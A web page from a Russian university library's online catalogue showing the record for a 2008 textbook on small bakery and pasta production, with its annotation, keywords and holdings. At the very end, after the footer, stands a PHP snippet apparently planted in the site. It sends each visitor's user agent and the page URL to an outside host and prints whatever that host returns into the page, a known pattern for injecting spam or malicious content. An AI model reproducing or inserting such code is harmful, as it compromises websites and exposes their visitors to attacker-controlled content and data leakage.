Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

384 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=66/К17-088836343")
Результаты поиска
E_OMSTU: Найдено записей: 1
1. 
66/К17-088836343
66/К17
Калачев, Михаил Владимирович.
Малые предприятия для производства хлебобулочных и макаронных изделий [Текст] : учеб. пособие для вузов по специвльности 260202 (270300) "Технология хлеба, кондитеоских и макаронных изделий" ... / М. В. Калачев ; дар. В. В. Арсеньев. - М. : ДеЛи принт, 2008. - 288 с. : рис. - Библиогр.: с. 285. - ISBN 978-5-94343-156-2 : 100.00 р.

УДК 664.6/.7(075)

Рубрики:
Пищевая промышленность -- Учебники и пособия

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- ДОЗАТОР -- ТЕСТО -- ПЕЧЬ -- СУШКА -- МАКАРОНЫ -- ТАРА -- УПАКОВКА
Аннотация: В учебном пособии в кратком виде изложены технологии ускоренного приготовления теста и описано технологическое оборудование для малых хлебопекарных и макаронныхпредприятий. Рассмотрены поточные линии, а также машины и аппараты линий для пекарен и макаронных цехов. Специальный раздел посвящен организации малого предприятия (в т. ч. составлению бизнес-плана). После каждой темы даны вопросы, позволяющие контролировать степень усвоения материала. Имеется словарь основных понятий. В приложении даны основные технологические расчеты машин и аппаратов. Учебное пособие предназначено для студентов пищевых ВУЗов.
Доп. точки доступа:
Арсеньев, В. В.дар.
Экз-ры полностью 66/К17-088836343
Имеются экземпляры в отделах:
ОНЛ (16.07.2018г. Инв.620594 - 100.00 р.) - свободен
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОНЛ11

В учебном пособии в кратком виде изложены технологии ускоренного приготовления теста и описано технологическое оборудование для малых хлебопекарных и макаронныхпредприятий. Рассмотрены поточные линии, а также машины и аппараты линий для пекарен и макаронных цехов. Специальный раздел посвящен организации малого предприятия (в т. ч. составлению бизнес-плана). После каждой темы даны вопросы, позволяющие контролировать степень усвоения материала. Имеется словарь основных понятий. В приложении даны основные технологические расчеты машин и аппаратов. Учебное пособие предназначено для студентов пищевых ВУЗов.

вернуться


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2814 - 22.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.70 с.8 запросов, 0.60c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;